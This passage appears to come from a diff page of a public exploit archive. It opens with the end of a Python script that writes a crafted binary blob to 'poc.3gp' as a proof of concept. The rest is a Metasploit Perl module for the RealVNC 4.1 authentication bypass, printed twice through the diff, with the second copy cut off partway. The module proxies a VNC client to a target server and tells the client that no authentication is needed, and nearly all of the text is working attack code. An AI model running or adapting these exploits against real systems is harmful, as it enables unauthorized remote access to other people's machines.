\xBF\xFF\x13\x0A\xFB\x86\xA1\x61\xCB\x80\x53\xB9\x07\xF9\x53\x69\xB1\x31\x36\x18\x0F\x61\x7D\x87\xC8\xC6\x6C\x39\x21
\x1B\x19\x20\x31\xA5\x2A\x72\xC9\x90\xCD\x68\xD9\x93\x55\x10\x90\x25\xC5\x10\x7A\xDA\x91\xD2\x3F\x5D\x9F\x44\x7E\x51
\x1A\xED\xE3\x63\x45\xD4\x20\x8F\xFF\x04\x95\x4A\x95\x83\x33\xEE\x7D\x3A\xCF\x04\xBB\x82\x90\xC2\x14\x53\xF3\xA7\x67\x26
\xDE\x48\xDE\x84\x64\x57\x83\x2C\xA9\xC8\xD5\x0B\x73\xDB\x1B\xBB\xDE\x24\x31\x33\x04\x17\x94\xA6\x16\x81\xE1
\x3F\x7D\x5E\x0E\xB3\x6D\xE8\xCF\x86\x5D\xB2\xD5\x54\xB6\x52\x95\x48\x89\x89\x28\xB7\xD2\xA6\xB0\x8F\xFF\xEF\x00\x00\x01
\xB6\xE5\xE2\x27\xFF\xBA\xF5\x85\x26\x71\x77\x17\x71\x58\x16\x28\x9B\xBD\x43\x4F\x38\xA5\xB8\x4A\xF3\xF2\xBE\xE1
\xAE\x5E\xEA\xEA\xEA\xFB\x19\x3B\xED\x38\x84\x30\x75\xEF\xA9\x9C\x30\xAB\xE9\x9D\x34\x99\x8F\xD6\x6F\xAC\x5D\xCB\x40\x28
\xED\x3C\xBC\xF6\x68\x1C\x03\x88\x98\x3C\x49\x04\xCC\xDA\x98\xB4\x50\xA2\x3F\xFB\xC7\xE0\x89\xA4\x6B\x78\xD3\x9F\xB8
\xAE\x15\x6D\xC0\x49\x84\x6B\x50\xA9\x72\x03\x57\x81\x67\x25\x89\x68\xC0\xC8\x34\xA5\x8D\x72\x95\x14\xBF\xE5\xFE\x80
\x6D\x50\xEF\x37\xAD\x0B\x3F\x27\x47\x4F\x23\xA9\xCA\x72\x88\x8D\x72\xB0\xB1\xDF\x45\x99\x51\x29\x41\x60\xBC\x14\x56\x29
\xDF\xEF\x51\xF9\xB2\xC7\xA9\x03\x73\xEB\xEA\x0B\x14\xC1\x81\x9C\x35\x34\x47\x63\x0E\xA8\xCE\xD8\x95\xEA\xA8\x1B\x4B\x05
\xF2\xAB\x82\x52\x82\xFF\x88\xCA\x64\xFA\x4B\xCD\xA2\xF4\x4D\x3C\x4B\x12\x4B\x80\xF5\xDF\x74\xBB\xF3\x7D\x5B\x9D\x84\xE7
\xDD\x6E\x57\x73\xED\xD5\x29\x3B\x05\x21\x6B\xD5\x49\xBD\xD7\x2A\x57\x54\x00\x51\x1A\x35\x39\x16\xEA\x99\x77\xF9\x75
\x4C\x95\xB2\x3D\xFD\xCC\x8C\xFF\x89\x3C\x68\xCC\xBC\x45\x07\x0E\x25\xB6\x52\x5F\x76\x8F\x65\x59\x12\x22\x2A\x07\xE4\x95
\x55\x69\x5D\xF3\x6D\x6B\x88\xA1\xC2\x93\x4F\x9E\xB0\x0D\x5D\xCC\xC4\x89\x05\x98\x68\x52\xF9\xD2\x0C\x29\x90\x99\xB5
\x7A\x1F\x11\x9F\x34\xD2\xCE\x8C\x9A\xC4\x31\x83\x2A\x78\xE9\x2C\x13\x82\xF0\x4A\x09\x7B\xF0\x7B\xE5\x0C\x3E\x7B\xDE\xF6
\xA8\xE6\xF6\xF4\x73\xA3\x24\xB2\x6E\x41\xC3\x17\x90\xF1\xF3\x8E\xAD\xFB\xDD\x5A\x98\x94\x87\x20\x75\x1C\xE2\x80
\x2E\x8F\x21\xC8\xAB\x70\x76\x50\x2E\xAD\x9C\xFF\xEF\x00\x00\x01\xB6\x54\xC2\x67\xFF\xBA\xF2\x41\xC2\x22\x42\xB6\xC5\xC1
\x7B\x9C\x1B\xB8\xBA\xC1\x4C\x2A\x63\x97\x68\x8B\x41\x55\xA3\x07\x49\xA2\x9F\x38\x4B\x3B\xAD\x83\x0C\x8A\x17\xC2\x30
\x2B\x60\x21\x1A\x7A\xE8\xC2\x17\x63\x5B\xD4\x42\xD0\xA9\xB5\xC6\x2C\x05\x4E\x3A\x69\x93\xF7\x75\xB0\x1C\xA2\x36\x6E\x32
\x88\x58\x02\x0F\xB2\x77\xFC\xFA\xC8\x45\xCC\x5B\xBA\xDF\x95\x81\xAF\x81\x47\xA1\x38\x31\xA1\xBB\xC5\x2A\x81\xC1\x50\xD4
\x14\x2E\x0B\xD0\xD4\x58\x5B\x3E\x3A\xB2\x7C\x60\x34\x21\xCE\x61\x69\x84\xCC\xFD\xA4\x9B\x06\x5E\x1E\x97\x45\x34
\x7A\x0C\xD5\x8A\x48\x4A\x18\x3E\x86\x17\xF6\xC9\x9D\x6D\xA2\x52\x4E\x10\x0F\x92\xAC\x9A\xA4\x0B\x28\xC4\x22\xDD\x6C\xF2
\xFC\x58\x8F\xD5\x84\xA0\xC5\x0F\xDC\x19\x04\x3C\x2A\xAD\x1B\x51\x47\xED\x8D\xA8\xC8\x29\xB5\x65\x93\x41\x89\xD8\xE2\x12
\x13\x11\x8F\x95\xB6\xAB\x6B\x5F\x06\x38\x78\x7C\x24\xCB\x6F\xB1\x2A\x4E\xB9\x20\x59\xA7\x88\xF5\x6F\xB0\xFF\x6D\xB2
\x8E\x87\x7C\xE0\x88\xA4\x76\xD5\x2D\x21\x9C\xFC\x64\xF1\x1A\x4A\xD4\xBC\xD1\x70\x79\xC1\x56\x74\x34\x16\xA6\xAB\x21\x46
\x2D\xD6\xC1\x86\xA4\x23\x30\xB6\x4D\x05\x19\x65\xBE\x9E\xED\x97\xBE\xC1\xE8\xEF\xDE\x59\xCC\x05\x31\xF8\xFD\x57\xB2\x09
\x63\xE5\x72\x89\x56\xE6\x2C\xAE\xEF\x09\x2C\x70\xFB\x84\x5A\x0A\x14\xFC\x3E\x63\x6F\x98\xD3\x49\x30\xF4\x69\x8E\x23\xE3
\x63\x51\x82\xD6\x16\x25\x05\x13\xCF\x9E\x35\xC8\x98\x81\x64\x57\x73\xCA\x53\x9D\x33\x18\x72\xEE\xCB\xBD\x67\x66\x9C\xD1
\xDE\x64\x11\x95\xA9\xA0\x4F\xD6\x58\x52\x34\x97\x89\x05\xB1\x55\xA0\x44\x7B\xA0\x4A\xF8\x5A\x44\x45\x26\x20\xB3
\x3E\x5F\xF0\x34\x08\x6A\xF4\x47\x65\x65\x87\x1A\x63\xB2\x72\x01\xC6\x40\x83\x64\x44\xE8\x0E\x2A\xF0\xCF\x99\xF1\x09\xA9
\xC7\xB8\x33\x89\xE5\xDE\x9D\x77\x14\xF9\x22\x0E\xBF\x83\x90\x33\x86\xB8\x74\xE7\xF8\x98\x15\x67\xD6\x81\x51\x5D\x44\x10
\x73\x6F\x49\x0A\x5B\x70\xD2\x92\xF2\x03\x19\x64\x5B\xFF\x66\x7B\x5A\xCE\x13\x38\xB7\x6B\xDC\x34\xE9\xE6\x6A\xE4\x05\x61
\x01\x98\x90\xE3\xF5\xF6\xE8\xEE\x81\x31\xD8\x0F\x7B\xFF\xF7\x00\x00\x01\xB6\x55\xE2\x27\xFF\xBA\xF2\x4C\x54\x21\x15
\xDB\x1A\x5C\xF9\x1E\xB6\x4F\xCD\x11\x22\xD2\x06\xF3\x05\x4C\x09\x16\x81\x11\x59\xFB\x4E\x0A\x4E\x12\xFC\xFA\x82\x5D\x82
\x03\xD2\xF5\x00\xE4\xF1\x47\x62\x58\x5A\xE1\xBC\x28\x94\xE4\xDD\x66\xEC\x27\x1C\x16\x8C\xFA\x48\x34\x37\x54\xE7\xB2\x76
\x64\xCB\x4F\xAC\x47\xA2\xC3\x3D\xC2\x8F\x50\x61\x79\x2C\xA5\x2E\x74\x91\xA4\x4E\x4E\xE3\xBD\xF1\x92\x07\x5D\x60
\xEB\xDF\x05\x20\x15\x06\x28\x0C\xCD\xBC\xD1\x11\xFB\x74\x23\x25\xFB\xA3\x51\xA1\x9A\x71\xB9\x43\xA1\xF2\xC7\x7A\xB4\x90
\xF1\x0E\xE8\x39\xB0\x75\x13\xF6\x5C\xF7\x34\xB1\x73\xC3\x7D\x1A\x00\xB7\x30\x74\x69\x80\xA5\x65\xCA\xA5\xA0\x75\x03\x43
\x93\x4A\x79\xA7\x97\x94\x67\x02\xB5\xC8\x37\x15\x10\x77\xEF\xB6\xA9\x29\x43\xCF\x2A\xF8\x1B\x55\x00\xAD\x19\x19\xAD\x77
\x8F\x4C\x95\xDE\xE8\x19\xB3\x35\x64\x24\x3C\xC2\x54\xEC\x6F\x05\x61\xD1\x13\x12\xE2\x86\xB8\x29\xAC\x8B\x13\xA1\x67\x90
\x90\x8F\xD5\xC6\x46\x4A\xBA\xD8\x17\xE2\x07\x19\x36\x6C\xF9\x38\x88\x96\x14\x56\x9F\xDB\x97\x00\xE6\xCF\x2B\xA9\xB6
\x5E\x11\x17\x29\x1D\xFB\xD7\x85\xEC\xCC\x38\x43\x66\xC9\xB6\x6B\x4D\x02\x69\xF2\x41\x6F\x28\xF7\xD4\x46\x99
\x9A\xDB\x3E\x16\x40\x57\x9D\x07\x34\x72\x98\x2C\xD6\x9E\x06\x77\x02\xCE\x65\xED\x5C\x27\x5C\xF9\xBA\x4A\xB1\x89\x05
\xFF\xC9\x13\xED\x98\x8B\x76\x21\xA4\x6B\x7E\x53\x29\xA7\x81\xF7\x10\x99\x0D\x01\x7F\x55\x70\x98\xCB\xD1\x6A\x53\x46\xD3
\xF2\x08\x22\xC3\xAF\xB0\x66\x1A\xC5\x4B\xEC\xE9\xCF\xD9\x56\x21\x8B\x1F\x29\x18\x66\x61\x61\x80\xE1\x86\x7F\x0C\xE5
\x1E\xCD\x75\xE9\x59\x64\x38\x46\x9C\xA1\xC4\x0D\xEE\x81\x94\x4C\x1B\xEF\x79\xDC\xBF\xE8\x22\x0C\xD0\x3A\x70\xA0\x80\x89
\xA8\xFC\x16\xFF\xFA\x06\xD8\x2A\xBA\x52\xEE\x5C\x5E\x6A\x02\x16\xCA\x9C\x2A\x70\x52\x56\x28\x54\xCB\x3A\xE6\x49\x52\xE2
\x51\xAF\x12\x90\x8D\x08\x3D\x5B\x4E\x62\x33\x4D\x13\x14\xA5\xDD\xA4\xE8\x4E\x28\x29\x10\x8B\x0E\x0A\x07\x0B\x07\x67\x93
\x30\xE5\xC2\x40\x95\x7D\x6A\x8F\xDF\xCB\xD5\x04\xDB\x6B\x1E\xD6\xC0\x91\x2A\x44\x95\x01\xAE\x99\x29\x60\xF2\x0D\x06\x47
\x39\xC3\xEA\xE6\x72\x1E\x28\x6B\x77\x4E\x4A\x55\xCB\xE6\x27\xB5\x28\x60\x57\xCF\xC5\x8E\x9F\xFF\xBF\x00\x00\x01\xB6\x56
\xC2\x27\xFF\xFB\x01\x5F\xE8\xE8\x02\x37\x06\xF6\x02\x89\xCA\x05\x11\xFF\x00\x43\x82\x22\x46\x65\x36\xEE\x51\xA8\xCF\x84
\x6B\x22\x61\xCB\x03\x13\x0C\x00\xE7\x62\x70\xE4\xF0\xDB\x19\xD4\x2D\xA0\x9C\xFB\x4B\x0E\x9A\xA5\x5D\xF1\x97\xBB\x65
\x3F\x08\xDC\xE5\xF8\x2B\x8C\x3B\x78\x8D\xB8\x17\xF7\x9B\x56\x96\x03\xBC\xE3\x37\xA0\xAE\x3E\xF2\xDE\x34\x80\xF0\x56
\x9A\xD5\x3A\xB1\x02\x7E\x0D\x60\x57\x01\x3C\x0A\x4D\x02\xB9\x00\x68\xA8\x05\x83\x28\x9A\x3C\x54\x06\x6F\xBD\xA9\x7E\xE8
\x40\x6D\x13\x05\xC6\xCE\x04\x12\xE9\xE8\x25\x0F\x2F\x94\xA9\xAD\x08\xBC\x64\x02\x79\xDF\xE3\x4C\x21\x7A\xC8\x0D\x97
\x5A\x07\x15\xAF\xEF\x5A\x34\x27\xF1\x87\xE5\x11\x9E\x08\x4A\x3F\xFF\x89\x7B\x64\x1F\xA8\x51\x91\x30\x50\xBB\x12\x62\x24
\xC0\x51\xD9\xB6\x14\x85\x0D\x04\x39\x5E\x86\xA4\x9E\x1C\xD2\xC8\xF2\x2E\x61\x38\x1E\x05\x20\xC7\xEC\x12\x88\x63\x00
\x8F\x43\x57\xD1\xB2\xFC\xEA\x32\x05\xA6\x46\x4A\x91\x48\xBA\xC2\xA4\x5E\xA3\x59\xC5\x2B\x90\x5A\x66\x8D\x25\x8D\xC1\x98
\x37\x7E\x07\xBE\xD0\x16\xF3\x2D\x29\xFE\xD4\xC4\x50\xB0\x50\x5C\xDF\xBD\x60\x29\x95\x75\x7E\x15\x9E\x05\x37\x67\x2E\x01
\xB1\x71\x75\x54\x07\x2F\x89\xE6\xA8\xF1\x62\x13\x92\x41\x19\x36\x15\x1E\x5C\xF9\x1B\xAB\x51\xFA\x72\x0F\x20\x89
\x9E\x1A\x73\x9B\xA4\x8B\x83\x10\xEC\x6D\x43\x0F\x5D\x05\xBB\xDE\x99\x24\x59\xCC\x30\x33\xED\xD6\x1F\x3E\x44\x68\xC9\xA1
\x3E\x71\x72\x13\x33\x98\x69\x67\xCE\x95\x8D\xB8\xE0\xA4\x87\x86\x2F\x9B\x37\x16\x6C\x2C\x1A\x8E\x94\x8E\x9A\x25\x4C\x28
\x2B\xC7\x80\x32\x83\x0E\x8B\xC7\xAA\x15\xD5\x3C\xE2\x9F\xB7\x63\x02\x37\xB2\xBE\xF3\xC2\x31\xAF\x7E\xA9\xAA\x31
\x1A\xDF\x6C\xE8\x47\x94\x6F\xC3\x99\xAD\x29\xE7\x4D\x23\x3C\x9B\x5E\x2C\x6B\x3C\x8E\x64\xE1\xD4\x87\x19\x7E\x20\xA1\xE1
\xE8\xEA\xFC\x37\xD0\xAA\x31\x1C\x68\x34\x1C\x30\x47\x07\x72\x70\xC4\x20\x9F\x95\x8C\xE9\x43\xA5\xCF\x3C\x88\xD9\x23\x92
\xC6\xE0\xB6\xDB\xF9\x65\x94\x46\x66\x11\x01\xCF\xE5\xFA\x8F\xD9\x59\xCE\x0C\x97\x47\xBA\xA5\x14\x1A\x9F\x58\x0D\x03\x30
\xDF\x16\xDE\x69\x13\x83\x36\xB3\xA7\x21\xDA\x4C\x32\xF7\x60\x1A\x3C\x45\xF9\x99\x81\x64\x65\x87\x70\x46\x44\x7F\x8C\x31
\x0D\x14\xFC\xC8\xC9\x33\x5C\x90\x29\xE1\xD0\x84\x5E\x07\xA4\x56\x3D\xB6\xC5\x6C\x72\x61\x8F\x55\x5E\x57\x65\x57\xE5
\x2A\x1A\x53\xDC\x1A\x84\x7A\xAA\xB6\x2D\x99\x3E\xA1\x05\xBD\xD0\x76\x91\x25\xAA\x7B\x0F\x0A\x94\x61\x33\x51\x86\x82\x97
\x85\x4E\xC2\x83\x57\x8E\x2F\x03\x68\x1D\x03\xA7\x12\x2B\x1A\x31\x4E\x73\x26\xA9\xCE\xC6\x93\x11\x36\x23\xD7
\xBC\xFF\xFD\x01\x40\x40\x06\xF7\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\xF0\xBB\xA4\x3E\x0F\x87\x90
\x82\x6F\xE0\x03\x76\x08\x08\x15\x56\x73\x3E\x2C\xFD\xA0\x23\x9E\x24\xC7\x0A\xA0\x41\x1C\x29\x62\x94\xA6\x0C\x5C\xC3
\x1F\x78\x9F\xC3\x8F\x0F\xC7\x38\x84\x2E\x9F\xF1\xA9\xE6\x0D\x16\xEC\xBF\xF2\xAB\x21\x5C\x7D\xD7\x04\x70\xA9\x7A\x2F\x03
\xFA\xE5\xE1\x0B\x1F\x6F\x3F\x1C\x8E\x32\x04\x2F\x54\x26\x78\x50\x2F\x9D\xDD\x5F\x8D\x0F\x14\xB3\xAC\x63\x45\x86\x88\x48
\xF4\xB6\x84\xDF\x8D\x86\x88\x51\xD5\x3A\x7F\xE9\x14\xD7\x05\xCD\x19\x97\xD1\xA2\xF1\xDD\x31\x1F\x35\x30\xB6\x97\x76
\xEF\x62\x6E\xCE\x99\xD9\x5A\xA3\xC5\x27\xBC\x20\x1D\x01\x1E\xBA\xD8\xBE\xA6\x8D\x92\x13\x90\xDA\x41\x44\x49\x0B\x72\x54
\x00\xBC\x7F\x5E\xF0\xDE\xB5\x40\xC4\x17\x42\x6D\xC6\xC9\x28\x15\x4D\x9C\x04\x05\xF1\x1A\xCD\xF3\x32\x5F\xBC\x0A\x70
\x1A\x48\x2F\x30\x0F\x96\x7D\xA3\x45\xE0\xB5\x67\x49\x6B\x4D\x85\x78\x5E\x01\x97\x03\x11\xBB\xDA\x42\x04\x43\xF0\x35
\x6C\x0C\x37\x81\x1A\x98\xD9\xC3\x9E\xAE\xA6\x6E\xAB\xAB\xD8\xA4\x64\x28\x70\x74\x3E\xB0\x6E\x31\x6D\xF5\x51\xA8\xF5\x36
\xD7\x2B\x97\x74\x0B\x4B\x5A\x75\xD0\x6F\x64\x23\xAB\xC5\x6F\x05\xA4\x74\xF7\xA2\xBC\x08\x75\x47\x58\xF0\x78\x12\x67\xA8
\x2F\x32\xC7\x78\x57\x1D\xFA\x36\xB6\x32\xD4\xFC\xD4\xFA\xC4\x00\x57\x8C\xAB\x09\xF7\xC8\x98\xC0\x12\xCF\xB0\xDD\xA6\x60
\xCA\xD5\x1A\x61\xAD\x41\xF6\xEE\xF8\x22\x60\x60\x12\xBF\x69\x57\x9A\x70\x01\x2D\x1A\x0D\x19\x26\x1E\xB6\xF3\x59\x93\x30
\x2D\xF8\x70\x58\x9F\xF6\x6F\xA5\x3B\x5D\xC4\x1C\x16\x58\xD2\xAA\xBD\x01\x4E\xD5\xA2\x08\xD6\x12\x0C\x52\x6F\x9D\x0C\x55
\xEF\x41\x56\x30\x02\xD2\x05\x00\x50\x3C\xDC\x43\x64\x46\x40\xB7\x91\x47\x34\xA3\x3C\x8A\xDC\xC9\xD6\xA4\x42\x0F\x40\xA3
\x91\x78\x85\x88\x4A\x79\x11\x13\x43\x37\xCC\xE3\x40\x60\xC3\xB3\x6C\xFB\x9D\x26\xEB\x8F\x1A\xAE\xB9\xA4\x00\xE0\x07\xF9
\xDF\x62\x2B\xE7\xC9\x4B\x1D\x77\xD9\x2B\x1B\x47\x89\x6C\x84\xBD\x89\x1C\xE4\x23\x7A\xE7\xB9\xD8\xCA\x6A\x17\x68\x88
\xCF\x0A\x16\x82\x49\x7B\x8E\x83\xD9\x1E\xC5\x54\x44\x9A\x33\x69\x4D\xC7\x6C\xE4\xD2\xC9\xF8\x1B\xFB\x63\x79\xE8
\x9A\xEB\xFE\x73\xE8\xE0\x5A\xF8\x61\xEE\xB4\xE7\x3F\x4E\x0D\xBA\x11\x9F\xBD\xB6\xD7\xF2\xA6\xC9\xF7\xCE\xF8\x6C\x4E\x93
\xBE\x0E\xB0\x51\x49\xC6\x9F\x2C\xDB\x10\xF3\x46\xB8\xFC\x7C\xED\x30\x3F\x01\x50\x15\xA4\x8C\xA5\x3A\x26\x02\x43\x34\xB1
\x80\x5D\xFC\xC5\x3C\x8A\x00\xBC\x0B\x00\x4E\xEE\x2E\xC3\xE6\xB5\xAF\xC7\x49\x53\xFB\xB9\x80\x61\xFA\xF1\xB5\x33\x07
\xBD\xD0\x28\xA9\x0A\x97\x2B\xE3\xD4\x15\x58\x9D\xE3\x31\xD5\xC8\xA4\x7D\xD3\xAE\x29\xB1\xCB\x0E\xEA\x84\x57\xA9\x86\xF2
\xB2\x1F\xC5\xF8\x11\xF4\x53\xE7\x6F\xE1\x36\x73\x12\xDB\x6B\x3A\xF7\xE4\xF8\x59\x74\x84\x12\x93\x5A\x9D\x3A\x16\xCF\xB9
\xC3\x33\x4C\x7E\x54\x10\x77\x2D\x41\x11\x48\x0F\xA0\x77\xF1\xE8\x56\x09\x93\xDA\x13\x67\x4F\x5A\xA4\x67\x6B\x8B\xEA\x86
\x2C\x44\x10\x53\x12\xD1\x61\x55\x7B\x68\x02\x78\x26\x11\x67\x9F\xF5\x77\x55\xB5\xA7\x4E\xC3\x36\xBE\xC5\x4E\x7D\xE9\xD5
\xCB\x48\x07\x01\x52\x15\x9D\x14\x66\x11\xA9\x08\xC2\x35\xAA\x50\x03\x00\x06\xEC\x05\xB1\x60\x23\x5B\x5B\x3D\x67\x75
\xED\x1E\x8E\xF4\x3D\x70\x22\x43\xA9\x72\xB0\x1C\x8C\x1C\x42\x79\x22\x8E\xD3\xB8\x05\x1A\xA1\x1D\x0E\x9F\x31\x6D\x2D\x59
\xF9\x4D\x04\xEE\xDD\xD5\x7A\xB8\x7D\xEC\xA6\x65\x7C\xEB\x40\x53\xF9\xF3\xD7\xBD\xAF\xF5\xBF\x27\xB5\xDC\x53\xB6\x3D\x68
\x53\xCE\xE3\xD9\x4E\x14\x29\x29\x24\x1C\x20\x4A\xE0\xDC\x33\x25\xC9\xB2\x75\x22\xE2\xEC\x76\x0E\x38\x96\x6B\xE8\x89\xC0
\x50\x9D\x03\x5A\x00\x5E\x71\xCF\x61\x74\xC5\x55\x01\x4A\xC7\x30\x5D\xAD\xEA\x60\x0E\xAD\xC7\x3B\xC6\xED\xCE\x40\x0E\x01
\x4E\x15\x99\x56\x15\x31\x25\x4E\x2A\x66\x52\xD2\xCF\x7C\x0E\x80\xC0\x4A\x03\x52\x94\x02\x9D\x98\xE6\x45\xA8\x02
\x9C\xBA\x7C\xFA\x25\xB2\x00\x59\x1D\x59\x76\x47\xD9\x6A\xDC\x26\xE8\xB7\x68\x76\x44\x8C\x3D\xFB\xC7\x42\x07\xE8\x63"
outfile = file("poc.3gp", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"

427
platforms/multiple/remote/1794.pm
View file

@ -1,214 +1,213 @@
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::realvnc_41_bypass;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use POSIX;
my $advanced = {};
my $info =
{
'Name' => 'RealVNC 4.1 Authentication Bypass',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore <hdm[at]metasploit.com>' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits an authentication bypass flaw in version
4.1.0 and 4.1.1 of the RealVNC service. This module acts as a proxy
between a VNC client and a vulnerable server. Credit for this should
go to James Evans, who spent the time to figure this out after RealVNC
released a binary-only patch.
}),
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'LPORT' => [ 1, 'PORT', 'The local VNC listener port', 5900 ],
'LHOST' => [ 1, 'HOST', 'The local VNC listener host', "0.0.0.0" ],
'RPORT' => [ 1, 'PORT', 'The remote VNC target port', 5900 ],
'RHOST' => [ 1, 'HOST', 'The remote VNC target host'],
'AUTOCONNECT' => [1, 'DATA', 'Automatically launch vncviewer', 1],
},
'Refs' =>
[
['URL', 'http://secunia.com/advisories/20107/']
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'RealVNC' ],
],
'Keys' => [ 'realvnc' ],
'DisclosureDate' => 'May 15 2006',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('LHOST'),
LocalPort => $self->GetVar('LPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp');
my $client;
# Did the listener create fail?
if (not defined($server))
{
$self->PrintLine("[-] Failed to create local VNC listener on " . $self->GetVar('SSHDPORT'));
return;
}
if ($self->GetVar('AUTOCONNECT') =~ /^(T|Y|1)/i) {
if (! fork()) {
system("vncviewer 127.0.0.1::".$self->GetVar('LPORT'));
exit(0);
}
}
$self->PrintLine("[*] Waiting for VNC connections to " . $self->GetVar('LHOST') . ":" . $self->GetVar('LPORT') . "...");
while (defined($client = $server->accept()))
{
$self->HandleVNCClient(fd => Msf::Socket::Tcp->new_from_socket($client));
}
return;
}
# Stolen from InjectVNCStage.pm
sub HandleVNCClient
{
my $self = shift;
my ($fd) = @{{@_}}{qw/fd/};
my $rhost;
my $rport;
# Set the remote host information
($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
# Create a connection to the target system
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $self->GetVar('RHOST'),
'PeerPort' => $self->GetVar('RPORT'),
'SSL' => $self->GetVar('SSL')
);
if ($s->IsError) {
$self->PrintLine('[*] Could not connect to the target VNC service: ' . $s->GetError);
$fd->Close;
return;
}
my $res = $s->Recv(-1, 5);
# Hello from server
if ($res !~ /^RFB 003\.008/) {
$self->PrintLine("[*] The remote VNC service is not vulnerable");
$fd->Close;
$s->Close;
return;
}
# Send it to the client
$fd->Send($res);
# Hello from client
$res = $fd->Recv(-1, 5);
if ($res !~ /^RFB /) {
$self->PrintLine("[*] The local VNC client appears to be broken");
$fd->Close;
$s->Close;
return;
}
# Send it to the server
$s->Send($res);
# Read the authentication methods from the server
$res = $s->Recv(-1, 5);
# Tell the client that the server only supports NULL auth
$fd->Send("\x01\x01");
# Start pumping data between the client and server
if (! fork()) {
$self->PrintLine("[*] Proxying data between the connections...");
$self->VNCProxy($s->Socket, $fd->Socket);
exit(0);
}
return;
}
sub VNCProxy {
my $self = shift;
my $srv = shift;
my $cli = shift;
foreach ($srv, $cli) {
$_->blocking(1);
$_->autoflush(1);
}
my $selector = IO::Select->new($srv, $cli);
LOOPER:
while(1) {
my @ready = $selector->can_read;
foreach my $ready (@ready) {
if($ready == $cli) {
my $data;
$cli->recv($data, 8192);
last LOOPER if (! length($data));
last LOOPER if(!$srv || !$srv->connected);
eval { $srv->send($data); };
last LOOPER if $@;
}
elsif($ready == $srv) {
my $data;
$srv->recv($data, 8192);
last LOOPER if(!length($data));
last LOOPER if(!$cli || !$cli->connected);
eval { $cli->send($data); };
last LOOPER if $@;
}
}
}
}
1;
# milw0rm.com [2006-05-15]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::realvnc_41_bypass;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use POSIX;
my $advanced = {};
my $info =
{
'Name' => 'RealVNC 4.1 Authentication Bypass',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore <hdm[at]metasploit.com>' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits an authentication bypass flaw in version
4.1.0 and 4.1.1 of the RealVNC service. This module acts as a proxy
between a VNC client and a vulnerable server. Credit for this should
go to James Evans, who spent the time to figure this out after RealVNC
released a binary-only patch.
}),
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'LPORT' => [ 1, 'PORT', 'The local VNC listener port', 5900 ],
'LHOST' => [ 1, 'HOST', 'The local VNC listener host', "0.0.0.0" ],
'RPORT' => [ 1, 'PORT', 'The remote VNC target port', 5900 ],
'RHOST' => [ 1, 'HOST', 'The remote VNC target host'],
'AUTOCONNECT' => [1, 'DATA', 'Automatically launch vncviewer', 1],
},
'Refs' =>
[
['URL', 'http://secunia.com/advisories/20107/']
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'RealVNC' ],
],
'Keys' => [ 'realvnc' ],
'DisclosureDate' => 'May 15 2006',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('LHOST'),
LocalPort => $self->GetVar('LPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp');
my $client;
# Did the listener create fail?
if (not defined($server))
{
$self->PrintLine("[-] Failed to create local VNC listener on " . $self->GetVar('SSHDPORT'));
return;
}
if ($self->GetVar('AUTOCONNECT') =~ /^(T|Y|1)/i) {
if (! fork()) {
system("vncviewer 127.0.0.1::".$self->GetVar('LPORT'));
exit(0);
}
}
$self->PrintLine("[*] Waiting for VNC connections to " . $self->GetVar('LHOST') . ":" . $self->GetVar('LPORT') . "...");
while (defined($client = $server->accept()))
{
$self->HandleVNCClient(fd => Msf::Socket::Tcp->new_from_socket($client));
}
return;
}
# Stolen from InjectVNCStage.pm
sub HandleVNCClient
{
my $self = shift;
my ($fd) = @{{@_}}{qw/fd/};
my $rhost;
my $rport;
# Set the remote host information
($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
# Create a connection to the target system
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $self->GetVar('RHOST'),
'PeerPort' => $self->GetVar('RPORT'),
'SSL' => $self->GetVar('SSL')
);
if ($s->IsError) {
$self->PrintLine('[*] Could not connect to the target VNC service: ' . $s->GetError);
$fd->Close;
return;
}
my $res = $s->Recv(-1, 5);
# Hello from server
